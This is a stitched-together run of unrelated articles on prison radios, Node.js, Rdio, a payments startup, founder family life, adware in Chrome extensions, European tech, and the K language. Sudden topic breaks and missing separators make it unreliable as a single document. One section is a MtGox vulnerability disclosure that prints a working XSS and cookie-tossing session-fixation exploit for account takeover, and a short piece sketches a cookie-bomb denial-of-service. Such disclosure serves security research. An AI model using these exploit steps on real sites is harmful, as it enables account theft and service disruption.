The pocket analog radio, known by the bland model number SRF-39FP, is a Sony “ultralight” model manufactured for prisons. Its clear housing is meant to prevent inmates from using it to smuggle contraband, and, at under thirty dollars, it is the most affordable Sony radio on the prison market.

That market consists of commissaries, which were established by the Department of Justice in 1930 to provide prisoners with items not supplied by their institutions; by offering a selection of shampoos and soaps, they shifted personal hygiene costs to inmates, while distractions like playing cards eased tensions among the nation’s growing prison population. More than half a million inmates each week shop at commissaries stocked by the Keefe Group, a privately held company that sells items to the Federal Bureau of Prisons, and twelve out of fourteen privately managed state departments of corrections. A sample commissary order form lists items like an I.B.M. typewriter ribbon, hair dye, RC Cola, Sensodyne toothpaste, chili-garlic sauce, Koss CL-20 headphones, and a “Sony Radio.”

Commissaries often carry other, bargain-brand radios, but according to former inmates and employees of the Bureau of Prisons and the Keefe Group, who spoke on the condition of anonymity, America’s federal prisoners are most likely to own a Sony. Melissa Dolan, a Sony spokesperson, confirmed in an e-mail that selling portable radios in American prisons has long been a “stable business” that represents “sizable” sales for the company. Of the models available, the SRF-39FP remains an undisputed classic, still found on commissary lists an impressive fifteen years after its initial release, making it nearly as common behind prison walls as Apple’s iPod once was outside of them, despite competition from newer devices like digital radios and MP3 players.

But sheer availability doesn’t explain its ubiquity. The SRF-39FP is the gold standard among prison radios in part because it runs on a single AA battery, and offers forty hours of listening time—longer than an iPod Classic. Digital models can require twice as many batteries, like the Sony SRF-M35FP, which runs on two AAAs. Federal inmates are particularly attuned to battery life because they are allowed to spend just three hundred and twenty dollars each month on commissary goods; more cash spent on batteries means less for snacks, stationery, clothing, and toiletries.

The importance of radio battery life in prison communities cannot be overstated; the devices are relied on for more than listening to music, hearing about local news and weather, and watching television (TV sets in common areas often use transmitters to broadcast sound on a dedicated frequency). A study conducted at San Vittore prison in Milan, Italy, found that “in a place where privacy is constantly denied, radio becomes a vital tool for building and maintaining one’s private self.” Some inmates even had a term for using their radio to create a bubble of personal space: “I headphone myself,” one said.

There is also a bit of prison culture itself at work in the story of the SRF-39FP. Radios like the one that was loaned to Demmitt are usually left behind by inmates who have reëntered the free world. Some prisoners believe that it is bad luck for radios to leave prison with their owners, while others believe that taking them simply violates the “convict code,” according to former inmates like Demmitt and Steven Grayson, author of “The Unauthorized Federal Prison Manual.” Whether radios are abandoned as a matter of solidarity, convenience, or good karma, they pass from inmate to inmate, serving one sentence after another. The durable, analog SRF-39FPs have been changing hands in this manner for a decade and a half, which adds up to a lot of radios in circulation.

This practice helps explain the relative rarity of the SRF-39FP outside prisons. A unit in good condition can fetch up to double or triple its retail value among enthusiasts and collectors like Gary DeBock, a co-founder of the Ultralight Radio Group. According to DeBock, the outside supply depends upon stock siphoned from the California prison system and sold on auction sites like eBay.

DeBock is a member of the “DXing” community, whose hobbyists attempt to pick up distant radio or television signals, including those from amateur or pirate radio stations. (“DX” is shorthand for “distant stations.”) DeBock’s fascination with the SRF-39FP began when he realized that it could receive AM signals from places as distant as Japan and Korea at his home in Puyallup, Washington. “Since then, I’ve probably had more exposure to the SRF-39FP than anyone else who has managed to stay out of prison,” DeBock said.

Others in the online DXing community argue that the SRF-39FP is superior to virtually every other pocket analog radio, praising it for its large tuning thumbwheel, over-all sensitivity and audio quality, and, above all, its reputed indestructibility. Electronics and radio collectors also marvel at features that are normally associated with professional equipment rather than consumer goods: in particular, an exceptional single-integrated-circuit receiver that insures reception in remote locations—or deep within heavy prison walls. In fact, the SRF-39FP was one of the first radios to use the breakthrough CXA1129N integrated-circuit chip, considered by DeBock to be the primary innovation among Sony pocket radios; it helped make the SRF-39FP the smallest and most sophisticated in a line of pocket radios that had launched two decades earlier, in the late nineteen-seventies.

In recent years, Sony has opted to shift its prison-radio lineup away from analog, focussing instead on digital models like the SRF-M35FP. Last year, the Bureau of Prisons decided that it was time to further upgrade prison tech. Following a successful test at the same West Virginia federal prison camp where Martha Stewart spent five months for lying about a stock sale, prison officials began selling MP3 players that allow inmates to download songs at terminals in prison commissaries.

A Bureau of Prisons spokesperson said that the MP3 program wasn’t expected to make money in its early years. Price is one reason: the MP3 player sold in federal prisons costs roughly three times as much as an SRF-39FP, and downloads can cost up to a dollar and fifty-five cents per song. Limited song selection is another reason; the Bureau of Prisons prohibits songs deemed explicit or likely to incite the inmate population. (JPay, a company that provides services to inmates, boasts that, with its catalogue of ten million songs, “no other music service in corrections offers as many tracks for download.”) However, despite modest expectations for the technology upgrade, the Bureau of Prisons spokesperson Ed Ross said that more than fifty per cent of federal inmates have already bought MP3 players. It seems inevitable that the MP3 player will soon completely eclipse radios like the SRF-39FP in American prisons, just as they did outside, but for now both devices are woven into prison life.

Josh Demmitt left his Oregon prison camp in May, 2007, two and a half years after he had arrived. While his radio didn’t come back with him to suburban Utah, within a matter of weeks he bought his first iPod.

Joshua Hunt is a freelance journalist who has reported on business, technology, and sports in Japan for the New York Times.

Illustration by Matthew Hollister.

Thu, 16 Jan 2014 23:00:00 UTC - Timothy J Fontaine

As the new project lead for Node.js I am excited for our future, and want to give you an update on where we are.

One of Node's major goals is to provide a small core, one that provides the right amount of surface area for consumers to achieve and innovate, without Node itself getting in the way. That ethos is alive and well, we're going to continue to provide a small, simple, and stable set of APIs that facilitate the amazing uses the community finds for Node. We're going to keep providing backward compatible APIs, so code you write today will continue to work on future versions of Node. And of course, performance tuning and bug fixing will always be an important part of every release cycle.

The release of Node v0.12 is imminent, and a lot of significant work has gone into this release. There's streams3, a better keep alive agent for http, the vm module is now based on contextify, and significant performance work done in core features (Buffers, TLS, streams). We have a few APIs that are still being ironed out before we can feature freeze and branch (execSync, AsyncListeners, user definable instrumentation). We are definitely in the home stretch.

But Node is far from done. In the short term there will be new releases of v8 that we'll need to track, as well as integrating the new ABI stable C module interface. There are interesting language features that we can use to extend Node APIs (extend not replace). We need to write more tooling, we need to expose more interfaces to further enable innovation. We can explore functionality to embed Node in your existing project.

The list can go on and on. Yet, Node is larger than the software itself. Node is also the community, the businesses, the ecosystems, and their related events. With that in mind there are things we can work to improve.

The core team will be improving its procedures such that we can quickly and efficiently communicate with you. We want to provide high quality and timely responses to issues, describe our development roadmap, as well as provide our progress during each release cycle. We know you're interested in our plans for Node, and it's important we're able to provide that information. Communication should be bidirectional: we want to continue to receive feedback about how you're using Node, and what your pain points are.

After the release of v0.12 we will facilitate the community to contribute and curate content for nodejs.org. Allowing the community to continue to invest in Node will ensure nodejs.org is an excellent starting point and the primary resource for tutorials, documentation, and materials regarding Node. We have an awesome and engaged community, and they're paramount to our success.

I'm excited for Node's future, to see new and interesting use cases, and to continue to help businesses scale and innovate with Node. We have a lot we can accomplish together, and I look forward to seeing those results.

Please post feedback and comments onthe Node.JS user mailing list.
Please post bugs and feature requests onthe Node.JS github repository.

← The Next Phase of Node.js

If you love something, set it free. Well, we couldn't agree more. So starting today Rdio is free in the U.S. on the web. That means you can listen to 20 million songs plus all the albums, playlists, and stations you love anywhere there’s a computer. Absolutely free.

As part of this update, we’ve added in-stream messaging to Rdio on the web. These new ads are short and sweet. Free listeners will hear a mix of new feature announcements, messages from partner brands, notifications about exclusive content, and other helpful tips.

Our ad-free option, Rdio Unlimited, will still be available for $9.99 a month for mobile and web access. If you’re already an Rdio Unlimited subscriber, your listening experience will stay exactly the same.

And don’t forget that Stations are always free on your phone. So now you can hear music you love, whether you’re walking around town or listening through your computer, without paying a thing.

To celebrate our new found freedom, we figured there is no better mode of expression than music. Turn up these songs and let freedom reign:

New to Rdio? Start listening for free right now. Want the most of your Rdio experience? Upgrade to Rdio Unlimited for mobile on-demand features and ad-free listening.

After eBay’s Paypal bought Braintree for $800 million earlier this year, who’s next?

While Stripe is known as an innovator in the payments space, it turns out there is another YC-backed company that’s on the rise too.

Balanced says it’s currently handling a volume of more than $370 million per year, and says it is servicing more than 440 marketplaces and crowdfunding platforms. That’s roughly eightfold growth since the beginning of last this year in both transaction volume and the number of customers. For comparison, Braintree said it was on track to process about $12 billion a year around the time it was acquired by eBay.

The company was originally built to help marketplaces like CrowdTilt, TheFancy and Reddit Gifts manage payments between their buyers and sellers. The complication here is that marketplaces have to both help buyers process their payments and help market-makers compensate their sellers.

So Balanced handles all of the basics like credit card processing, fee collection, tax reporting and fraud prevention. But they also do things that competitors don’t allow like next-day payments.

One other unique part of Balanced’s company culture is that everything they do is open sourced. So there are non-Balanced employees who are contributing to the company’s source code and feature ideas are discussed openly with Balanced’s customers even before they’re built. Balanced’s CEO Matin Tamizi was inspired by companies like App.net and Gittip, which share product specs, roadmaps and open-source code.

While they originally positioned themselves as a payments provider oriented towards marketplaces, other competitors have moved in as well. Stripe launched its own service for collaborative consumption startups like Lyft in June of last year.

To keep up with the competition, Balanced is introducing a new set of pricing tiers. If you’re running a business that processes less than $100,000 per month, your rate is the standard 2.9 percent plus 30 cents a transaction. Braintree and Stripe have the same basic rates.

But above $100,000 per month, it drops to these rates:

Balanced has raised at least $3.4 million in funding from investors including Andreessen Horowitz, SV Angel, Airbnb CEO Brian Chesky, celebrity investor Ashton Kutcher, and Reddit CEO Yishan Wong.

One of the differences between being a CEO and a venture capitalist is that I obviously meet with many more CEOs now than I did then. As such, it has become more apparent that many of my struggles as a CEO are surprisingly common. One observation that stands out, probably because it is rarely discussed, is how many founder/CEOs have relationship struggles with their significant others and families. For me, the brightest years at IronPort were without a doubt the darkest years at home. While I was focused, motivating, articulate, and decisive at work, I was inconsiderate, preoccupied, self-centered, and lazy at home.

Now, having worked through that time with my family, I’m in a much better place to reflect on what happened, how I could have handled things differently, and offer some advice to other founders who may be caught up in a similar dynamic.

As a first time founder/CEO, I really had no idea what I was doing. Sure, I had gone to business school, worked at plenty of large companies and even other successful startups, but nothing prepared me for the incredible stress and overwhelming life focus of actually running a startup.

I did my best to move up the learning curve: I surrounded myself with great mentors, board members, coaches, and, most importantly, the challenging, wicked smart executive team members that worked with me everyday. We definitely made lots of mistakes, but we did many things right and IronPort grew to be a very large and successful company over the seven years before we ultimately sold to Cisco in 2007. All that said, I believe I could have been a much more effective leader if I had leaned in at home. As my relationship with my family deteriorated, so did my concentration at work as I was constantly trying to manage it in fits and starts. Here are some details of my personal struggle:

Part of the magic of a startup is the fear of death. You have only so much money in the bank, and if you don’t get to the right milestone before you run out, then you’re dead—company goes under, it’s over. There’s a way to cheat death when you are not going to make it—you sound the alarm and force everyone to code through the night and/or weekend. This is stereotypically the life one signs up for at an early stage tech startup. Get in early, kill yourself with a team making something great, and get a meaningful product out before you run out of money. And hopefully, make it up to that hardworking team with stock options later.

I didn’t code, but as the CEO, I felt it necessary to be there physically with the engineering team. I would sit through architecture discussions, product reviews, and wireframe layouts. Sometimes, I would just get everyone lunch or dinner. When we started pulling consistent coding weekends, we brought in the entire management team to serve the engineers: We brought them food, washed their cars, got oil changes, took in their dry cleaning, and arranged for childcare for their kids in the office. Lead by example, lead from the front, was the CEO approach I convinced myself was necessary.

Now contrast this with my home life.

One of the stated values at IronPort was “work/life balance,” but I clearly wasn’t living it. I was rarely home. And when I was home, well, let’s just say I wasn’t particularly helpful or cheery. My perspective at the time was: I’m killing myself at work, so when I get home, I just want to kick back with a cocktail and watch some TV. All I do is talk to people all day long and so at home, I’d really prefer not to talk much, just relax.

This posture was, of course, completely opposite to how my wife felt. After having left her VP role in a successful startup, she was now home speaking in monosyllabic words to kids all day and was starving for adult conversation when I got in the door. And that part about sitting on my ass in front of the TV with a cocktail? This ran counter to all of her efforts to teach the kids about pitching in as a family. The message of everyone helping to cook, clean, and be responsible for the household fell completely flat when daddy wouldn’t so much as take out the trash or change a light bulb. Nope, I was far too important for that and suggested she should hire someone to keep the house clean or even cook, if that was “stressing her out”.

Ugh. I was completely missing the point and talking past her… I was setting such a great example at work, but such a terrible one at home where I often acted like a self-important asshole.

As IronPort grew, I was constantly on the road with customers, press, analysts, and of course, recruiting and energizing employees. We ultimately did over 60% of our revenue outside of the U.S., and we all felt it very important to support all of our disparate offices from Europe to Asia to South America. There were times in a given month when I was gone 50-75% of the days. Even when I was home, I was usually in this brutal state of sleep deprivation and recovery from adjusting to yet another time zone. While I was gone, 100% of the daily burden fell on my spouse, usually resulting in a solid week of arguments upon my return. I started referring to the week after a long trip as “re-entry”, like John Glenn’s Friendship Seven fireball.

After years of working full-time with our first child, and part-time after our second, my Harvard MBA wife, who had had an amazing career in her own right, “decided” to become a full-time mom and take care of our children shortly after our third was born. I say “decided” because at the time, it was clear to both of us that I wasn’t willingly scrubbing in as a 50/50 partner at home. She endured the rocky years while I was running IronPort, but insisted that when it was over, we were going to re-evaluate and recalibrate.

I took about 18 months off in between IronPort and joining Andreessen Horowitz. During that time, I was packing lunches, driving carpools, and making dinners, and began doing my real part in the family. With the help of my wife and other role-model dads, I essentially got re-programmed and it has continued to work for us even though I’m working full-time again. Now one might say that being a partner at a VC firm, even a hard working one, isn’t the same as being a founder/CEO of a startup… I’ll admit that’s true. However, now that I’m on the other side, I believe that I could have coached my former CEO self to success as well. Here are the most critical things I needed to change:

Disconnect to Connect. Although it’s easy for me to see it now, at the time I clearly thought what I was doing at work was far more important and urgent than what was going on at home. It sounds weird now, but this required a real mindset change for me. My wife dropped a bunch of hints (e.g. “How did I suddenly land in a 1950’s relationship?!”), but I was undeterred in the thick of it. The shock of almost losing the relationship made me pay more attention, but I was only going through the motions with my mind still firmly attached to the business. I believe the change in attitude came from truly connecting and tuning in at home. This required disconnecting from work (e.g. turning off the computer and phone), and completely focusing all of my attention on the details of the home. Cooking a great meal. Helping with a science project. Discussing the future with my partner. I was often rightly accused of being physically present without being mentally present. If you find yourself sneaking into the bathroom to complete emails, then you’re certainly not in the moment… Getting some time physically out of the Silicon Valley pressure cooker was also helpful in changing my perspective.

Participate. It’s just not possible to be a real partner if you aren’t materially participating. I believe even the busiest CEOs must drive a carpool, pack a lunch, help with homework, make a breakfast or dinner, and consistently attend school events. Being involved every week is the only way to stay connected at home, and it cannot be outsourced. No matter how exhausted I am from traveling, I push myself to “not be lazy” at home—it’s just too important. When you are involved, there is a natural cadence to planning the week together and communication improves dramatically.

Communicate. Multiple, daily phone and text check-ins are the norm now, but not then. When I was traveling at IronPort, I would sometimes go for days without communicating at all. Now that I am completely tuned in to the weekly family schedule, we plan and calendar family meals (perhaps the single most important thing we do), pickups and drop-offs, and make adjustments on the fly. E.g. Did some time suddenly free up so I can complete an errand? Can I pick something up on the way home? Etc. My norm is to check in between meetings, but if I’m the “parent on duty”—i.e., if my wife is out of town—then I will start a meeting with, “You’ll have to excuse me, but I’m the parent in town so I need to keep my phone handy in case of an issue.” Communication was by far my biggest area for improvement.

Planning and Priorities. My wife and I have a weekly date night. My son and I are in a fantasy football league together. I cook with my daughters. Most times these have become immovable appointments on my calendar. There is a phrase—“truth in calendaring”—if something is important, then you must carve out time in your life to do it. When my calendar reflects that I can’t do a meeting on Wednesday and Friday mornings before 9am, because I cook breakfast and drive a carpool, then it’s amazing how meetings just don’t get scheduled. If at all possible, living physically close to the office is also a huge help to juggling the priorities. It means that I can cut out for a family dinner and then go back to the office or have a late meeting afterwards.

In retrospect, I believe that I could convince the hardest working CEOs that having some real life balance by investing in your important relationships will make you a better CEO. When you are out of balance, it affects your stress, judgment, and ultimately becomes another destabilizer just when you need to be the most put together. I also believe this change is actually a much better example of leadership than the one I was exuding. When a leader shows the way toward getting things done and balancing their life, it sets a much better example for everyone else in the company who struggle with it too.

One of the coolest things about Chrome is the silent, automatic updates that always ensure that users are always running the latest version. While Chrome itself is updated automatically by Google, that update process also includes Chrome's extensions, which are updated by the extension owners. This means that it's up to the user to decide if the owner of an extension is trustworthy or not, since you are basically giving them permission to push new code out to your browser whenever they feel like it.

To make matters worse, ownership of a Chrome extension can be transferred to another party, and users are never informed when an ownership change happens. Malware and adware vendors have caught wind of this and have started showing up at the doors of extension authors, looking to buy their extensions. Once the deal is done and the ownership of the extension is transferred, the new owners can issue an ad-filled update over Chrome's update service, which sends the adware out to every user of that extension.

We ought to clarify here that Google isn't explicitly responsible for such unwanted adware, but vendors are exploiting Google's extension system to create a subpar—and possibly dangerous—browsing experience. Ars has contacted Google for comment, but we haven't heard back yet. We'll update this article if we do.

A first-hand account of this, which was first spotted by OMGChrome, was given by Amit Agarwal, developer of the "Add to Feedly" extension. One morning, Agarwal got an e-mail offering "4 figures" for the sale of his Chrome extension. The extension was only about an hour's worth of work, so Agarwal agreed to the deal, the money was sent over PayPal, and he transferred ownership of the extension to another Google account. A month later, the new extension owners released their first (and so far only) update, which injected adware on all webpages and started redirecting links. Chrome's extension auto-update mechanism silently pushed out the update to all 30,000 Add to Feedly users, and the ad revenue likely started rolling in. While Agarwal had no idea what the buyer's intention was when the deal was made, he later learned that he ended up selling his users to the wolves. The buyer was not after the Chrome extension, they were just looking for an easy attack vector in the extension's user base.

This isn't a one-time event, either. About a month ago, I had a very simple Chrome extension called "Tweet This Page" suddenly transform into an ad-injecting machine and start hijacking Google searches. A quick search for the Chrome Web Store reveals several other extensions that reviewers say suddenly made a U-turn from useful extension to ad-injector. There is even an extension that purports to stop other extensions from injecting ads. Injected ads are allowed in Chrome extensions, but Google's policy states that which app the ads are coming from must be clearly disclosed to the user, and they cannot interfere with any native ads or the functionality of the website.

When malicious apps don't follow Google's disclosure policy, diagnosing something like this is extremely difficult. When Tweet This Page started spewing ads and malware into my browser, the only initial sign was that ads on the Internet had suddenly become much more intrusive, and many auto-played sound. The extension only started injecting ads a few days after it was installed in an attempt to make it more difficult to detect. After a while, Google search became useless, because every link would redirect to some other webpage. My initial thought was to take an inventory of every program I had installed recently—I never suspected an update would bring in malware. I ran a ton of malware/virus scanners, and they all found nothing. I was only clued into the fact that Chrome was the culprit because the same thing started happening on my Chromebook—if I didn't notice that, the next step would have probably been a full wipe of my computer. 

The difficult part of this for users is that normal removal techniques will not work. Virus scanners are unlikely to flag ad-injecting JavaScript as malicious. Extensions are synced to your Google account, which means that even wiping out a computer and reinstalling the OS will not remove the malware—signing-in to Chrome will just download it again. The only way to be rid of the malware is to find the extension in chrome://extensions and remove it—and to make sure the removal gets propagated to your account and down to all your other devices. Even when you have it narrowed down to Chrome, since nothing detects a malicious Chrome extension, the best course of action is to meticulously check the latest reviews of every extension and hope that someone else has figured out where the ads are coming from.

What can users do to protect themselves? It's very hard to keep yourself in the loop with Chrome extension updates. Extensions usually don't have changelogs, and there is currently no way to disable extension auto-updating. One way to stay a least slightly informed of what is going on is to install an extension that will notify you when your other extensions get updated. Other than that, the only other option is to stop using extensions entirely, which is a little extreme. Just keep an eye on the simpler extensions from smaller extension makers—those are the ones at most risk of being gobbled up by a malicious entity. Chrome will require your approval if an extension adds new permissions, but the magic permission that allows ad-injecting is called "access your data on all web pages," which many legitimate extensions already use. A malicious extension buyer could even look for an extension that already uses this permission so that their update will arouse the least suspicion among current users.

The reality, though, is that while it's extremely easy for a novice user to install an extension, it's nearly impossible for them to diagnose and remove an extension that has turned sour, and Chrome Sync will make sure that extension hangs around on all their devices for a long time. The author of Add to Feedly stated that his extension had around 30,000 users before it was sold and packed full of ads. Today, despite the flood of unhappy user reviews, the Chrome Web Store shows 31,548 users. Auto-updating from a trusted source is one thing, but when that user trust can be bought and sold—and extension ownership can change hands without the users being informed—something needs to be done.

But it *is* MtGox. When I started checking bitcoin-related websites it was my target #1. First XSS was found in 5 minutes on payments.mtgox.com, few mins later I discovered session fixation leading to account takeover. Long story short, here's exploit:

name='document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"';
location='https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel';

1. Create Checkout button https://www.mtgox.com/merchant/checkout and set Cancel URL to javascript:eval(name);

2. Put your payload in window.name and redirect to "https://payment.mtgox.com/38131846-a564-487c-abfb-6c5be47bce27/e6325160-7d49-4a69-b40f-42bb3d2f7b91?payment[cancel]=cancel" (GET-accessible action). MtGox has X-Frame-Options so it won't work in iframe.

3. User is supposed to wait 5 seconds until setTimeout in JS assigns location to our javascript: URL.

4. Get some guest SID with server side and fixate it using this XSS. It's called Cookie tossing, and our cookie shadows original SESSION_ID because more specific Path-s are sent first.

  document.cookie="SESSION_ID=SID; Domain=.mtgox.com; Path=/code"

5. Close the window.

6. Someday user logs in, and his session will stay the same SID. Your server script should run cron task every 5 minutes, checking if SID is still "guest". As soon as user signs in you can use fixated SID to perform any actions on behalf of his account - "Session riding".

Timeline

Jan 11 - vuln reported

Jan 14 - vuln accepted and fixed in 3 hours. 

FYI use nils@tibanne.com as "security@mtgox.com" (MtGox doesn't have neither bounty program nor email for reports). 

Editor’s note: Sten Tamkivi has been a software entrepreneur for 16 years and spent the recent half of his career as an early executive at Skype in Tallinn, Estonia. Sten is now an Entrepreneur in Residence at Andreessen Horowitz. Follow him on his blog and on Twitter @seikatsu.

Go to Europe these days – to Berlin, London, Helsinki – drop in on any of the regional tech confabs and you will quickly see that the European startup scene is in the most bustling, vibrant shape it’s ever been. The potential is everywhere, and the energy is undeniable. Then you return Stateside, in my case to Palo Alto, and Europe isn’t just irrelevant among the tech industry power-set. It has virtually ceased to exist.

That is a mistake. Blame for the ruptured relationship lies on both sides of the Atlantic, but it is Europeans that have the power, and should have the motivation, to mend things.

I’m proud to be Estonian and European, but recently realized that very soon I will have been living in California for 10 percent of my life. I had a front-row seat to the first Internet boom as an exchange student at the super-wired Monta Vista High School in Apple’s backyard. I returned to the U.S. with some frequency initially as an executive with Skype, and later to pursue a business degree at Stanford. My latest perch in Silicon Valley today is as an entrepreneur-in-residence with venture capital firm Andreessen Horowitz.

Let me give you a small taste of the way Europe was woven into the discussion at Stanford’s Graduate School of Business. Over the course of four quarters I heard one professor make one joke about short-term macroeconomic troubles in Greece. We also had a visit from a well-dressed and charming British banker in our private equity class. That’s it. No European startups, no cases of European success stories or failures. A joke and a banker.

Important Places

I’m not blaming Stanford. In talking to many people about my growing realization that the place of my birth simply didn’t matter to most people in the Valley, I began to understand that there is a mental hierarchy of “important places” for people building, investing in and studying tech companies in Silicon Valley. They exist in the following order:

1. Silicon Valley. Practically considered, the opportunity cost of venturing out of the bustling 30-mile radius of Sand Hill Road, whether you are an entrepreneur, investor or academic, is usually just too high.

2. The U.S. East Coast. Yes, stuff is happening in Boston and New York, but not so much that a once-a-month trip can’t cover most of it.

3. China. Massive tech companies do rise in China and go public in the United States, and Chinese investors have gobs of cash to invest in the Valley. There is a constant back and forth between both Pacific coasts. But it’s not just geography, and the historic manufacturing relationship that is stimulating this cozy dynamic. The Valley is looking more and more towards China for the next tech trends and expansion opportunities.

4. The rest of Asia. India’s diaspora links to the U.S. are strong. Southeast Asia’s growth is hard to miss, and there is interesting mobile stuff happening in Korea and Japan.

5. Latin America/South America. Markets in Mexico and Brazil are increasingly ripe for Silicon Valley tech, but the region is still a distant gleam for most companies.

6. Europe. Here is what I mostly hear about Europe: “I took my wife/husband to Paris last year for our anniversary, and we dropped by Rome. Great food, so much history, Europe is wonderful!” For vacation.

Rather than relying solely on my anecdotal examples of “important places,” I turned to LinkedIn. Mapping my network through the lens of the topic at hand, I can confirm that, while Estonia, the Nordics and Europe in general comprise a tightly knit blue blob, and Skype in Estonia (orange) and internationally (green) is an organism in itself, the Silicon Valley venture capital and serial entrepreneurship circles float as a distant burgundy cloud. And the international graduate student and teacher body of Stanford is even further out on the right.

Those familiar with Granovetter’s theory about the strength of weak ties should feel a wave of joy here. Sure, there are benefits of weak ties, but then again, there are virtues to tight-knit communities talking to each other frequently, sharing the successes and learning from each other’s mistakes.

And that is exactly what is missing between the U.S. and Europe — a real bridge. So how do we build one, and what can both partners in constructing this connection hope to gain?

Let’s start with Europe.

Why the Hell Are You in Silicon Valley? And Don’t Say It’s the Money

Raising money tends to be the No. 1 rationale from founders when asked why they’re in the Valley. It’s also the No. 1 mistake people make. You will be far more successful raising seed and early-stage VC financing close to home, on whichever side of the Atlantic it may be.

Yes, the internationalization of the venture capital industry is well on its way, and one can draw quite pretty graphs of the increasing money flow across the globe. Bollocks. Here’s why you, European entrepreneur, aren’t going to get that money.

Looking at closed early-stage deals listings in Pitchbook, it is very clear that U.S.-based VCs invest in U.S. companies, and European VCs invest in Europe.

In my experience, this mindset applies to institutional investors in a clearly structured way, but is a notable behavior even for private angels in AngelList. Investors believe that there is much more that they bring to the table than just money – but that ineffable “value” is hard to bring across long distances and multiple time zones. No matter how much the video calling has improved, board seats, hiring networks, corporate development efforts and just quick (unscheduled!) calls work much better in proximity. Raise your money at home.

Part of building a solid bridge with the U.S. is having a solid reason for being here, other than money. Selfies at Infinite Loop Drive and group pictures in front of Facebook and Google headquarters don’t count.

One good reason for touching down at SFO might be that it’s because the companies that matter in your space – the ones you want to compete with, learn from, partner with or steal bored employees from – are in Silicon Valley. Ditto for customers.

That said, you need to honestly evaluate decamping from Europe against your own personal strengths and networks. I am in the thick of things on Sand Hill Road. Yet that relative advantage doesn’t change the fact that I have been building software companies for 16 years in Estonia and worked mostly with teams around Scandinavia and in Prague or London. This is where the best engineers I know are. This is the core of my network. This is my actual unfair home-court advantage.

If anything makes me stay Stateside, it must far outweigh the strongholds I’m leaving behind. That applies to every European (indeed everyone wherever they are from) pondering a move to Silicon Valley.

Why Silicon Valley Should Love Europe Back

So if exchanging money for equity isn’t the way to create tighter bonds between Europe and the Valley, the question becomes: how can we build more non-financial ties between our scenes?

When building high-value ties in any network, the question should never be what you get, but rather what can you give to the other party? What can you help with? What can you teach? What can you spare? This tends to be true with your friends, your community, and your country –  and how you ought to think about transatlantic relationships.

If we Europeans can muster the confidence, and the U.S. can tone down its arrogance, Europe actually has a lot to give to Silicon Valley. Here are just a few examples.

Talent. Silicon Valley’s weakest spot today is finding enough good engineers and designers. The European contribution here in the simplest case is talent. The next level of complexity, but more sustainable for both sides, are development outposts across the pond. This could also take the form of M&A targets that Europe could offer – something that Meg Whitman in her eBay CEO days used to call “off-balance-sheet R&D” when buying up another innovative marketplace team in the Netherlands or Sweden.

What about making this a two-way street, and providing interesting-timed job adventures for early-career Valley experts? Why be the 3,481st guy in Facebook, when during a three-year stint in a cool European city you can be No.1 in the entire country in what you do? Yes, moving American hotshots to Europe can be a tough sell, but we did it successfully at Skype, and companies like Soundcloud are doing it again.

Sharing new models. For any European who has spent an extended time here, Silicon Valley can often feel surprisingly backwards. When it comes to online and mobile applications truly embedded in how people go about their daily chores, how they sign and exchange legal documents, how they interact with the government, how they do their consumer banking, how they receive services from their doctors and so forth, many places in Europe are light years ahead of what is widely available in the U.S. We can share those ideas and expertise.

400 million customers. For most successful entrepreneurial ventures, there comes a day when growth needs to be found outside of the home market. And no matter how much the mobile handset makers talk about the next billion people coming online in Africa, and how lucrative the already-online billions of users in Asia are, the most common scenario for the Groupons and Airbnbs and Ubers of the foreseeable future is still to figure out their expansion strategy for the U.K., Germany and France.

Europe is still the rational next market for most U.S. rocket ships who are looking to find customers with above-average incomes and access to credit cards who live on infrastructure you can deliver your products and services to. Who better to help U.S. entrepreneurs crack Europe than Europeans?

Global skills. The value of understanding foreign markets does not stop with Europe, though. Far too much of U.S.-originated innovation is born in the form of English-language, iOS-only apps with hard-coded dollar signs. European entrepreneurs, especially those from the smallest countries, are much better trained at operating globally in multi-currency, multi-cultural markets. As a proof point, look at how the likes of Finnish Rovio (Angry Birds) and Supercell (Clash of Clans) or Skypers in London or Tallinn and Evernoters in Zürich or Moscow have conquered the astonishingly tough Chinese and Japanese markets.

Security and privacy. In the post-Snowden days we’re living in, there is a new set of questions around the physical and legal location of users’ data and the regulations governing its privacy. Although the rules and behaviors driving this have been evolving in a U.S.-centric way thanks to U.S.-based Internet giants, if you look at where the users of the Internet live today, less than 10 percent of them are in the United States. And that share is declining.

It is obvious that nations other than the U.S. will have an increasing say in the governance mechanisms and regulation of the system with Europe at the forefront. And this is not just a government thing. The European tech scene can help its U.S. peers figure things out as private entities first.

If we Europeans can follow through with an approach of giving something unique and valuable, as opposed to just trying to get funding from the other side, I believe the European and Silicon Valley tech scenes have a shot at moving closer together. For U.S. players, this would presume paying a little bit more attention to the world outside. For Europeans, it’s mustering a bit more confidence in ourselves.

I am sure more non-financial bridges can be built. And as it has been shown by some VC investment-related research: Cold hard cash will eventually follow the international corridors where smart people are already on the move.

[Image: Shutterstock]

TL;DR I can craft a page "polluting" CDNs, blogging platforms and other major networks with my cookies. Your browser will keep sending those cookies and servers will reject the requests, because Cookie header will be very long. The entire Internet will look down to you. 

How many cookies can I creates? Many!

What cookies is browser going to send with every request? All of them!

by Arthur Whitney

Introduction

K is the executable notation at the heart of a high performance programming platform. It is designed for analyzing massive amounts of real-time and historical data – ideal for financial modelling.

K is fast, comprehensive, accessible and productive. It gets its speed from an incremental compiler and well-designed memory management, data types and primitives. It gets its universality by combining easily with other products and including high-performance built-in spreadsheet, graphics and database management. The productivity and accessibility come from the design of the core language.

This paper gives some examples written in K and a brief summary of the language. This work came about because of my experience in using C and Fortran and my work designing, implementing and using several different programming environments including LISPs, object-oriented systems and APLs. In particular, I learned a lot from designing, implementing and using the very successful A+ at Morgan Stanley. I am convinced that the best possible programming environment, at least for finance, is one that is based on high-performance list processing with APL-like primitives. This gives the best combination of productivity and performance.

Examples:

K has a small and powerful vocabulary. Every primitive operation is a single ASCII symbol. For example,

 p: 1.5 1.6 p gets 1.5 and 1.6
 q: 3 4 q gets 3 and 4
 p*q p times q
4.5 6.4
 +/p*q plus OVER p times q
10.9

The basic atoms of the language are characters, numbers, symbols and lambda-expressions. Lists are made up of items. Each item is a list or an atom. A table is a list of equal length lists. In mathematics instead of atom, list and table we say scalar, vector and matrix. For example,

 s: 3 a scalar, i.e. an atom.
 v: 3 4 a vector, i.e. a list of 2 atoms.
 m: (2 3 4 a matrix, i.e. a list of 2 lists of 3 atoms.
 5 6 7)

Then,

 +/v plus OVER items of v, i.e. 3 + 4.
7
